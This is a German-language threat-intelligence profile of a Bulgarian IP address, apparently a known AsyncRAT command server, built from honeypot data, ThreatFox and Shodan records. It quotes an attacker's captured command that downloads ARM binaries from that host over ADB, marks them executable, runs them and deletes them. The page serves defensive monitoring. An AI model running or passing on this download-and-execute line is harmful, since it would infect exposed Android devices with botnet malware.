TROYANOSYVIRUS
Aktive BedrohungNIEDRIG

192.109.200.197

Herkunftsland🇧🇬 BG
Erste Erkennung20.4.2026
Letzte Aktivitat20.4.2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
6
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
0
Malware

Geolokalisierung

Land
🇧🇬 BG
Stadt
Unbekannt
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Angriffsarten

adb_honeypot

Angegriffene Ports

5555

Zugehorige Malware

Keine zugehorige Malware

Ausgefuhrte Befehle

$cd /data/local/tmp/; busybox wget http://192.109.200.197/armv5l; chmod +x armv5l; ./armv5l; wget http://192.109.200.197/armv6l; chmod +x armv6l; ./armv6l; wget http://192.109.200.197/armv7l; chmod +x armv7l; ./armv7l; rm -rf arm*2x

ThreatFox Intelabuse.ch

⚠️BEKANNTER C2-SERVER
Malware-Familien
win.asyncrat
Bedrohungstypen
botnet_cc
Zuverlassigkeit: 100%

Shodan InternetDB ExpositionShodan

InternetDB-Daten, nicht in Echtzeit

Ports
445338959855986
Hostnames
longingtank.ptr.network

Risikobewertung

10
/100
NiedrigMittelHochKritisch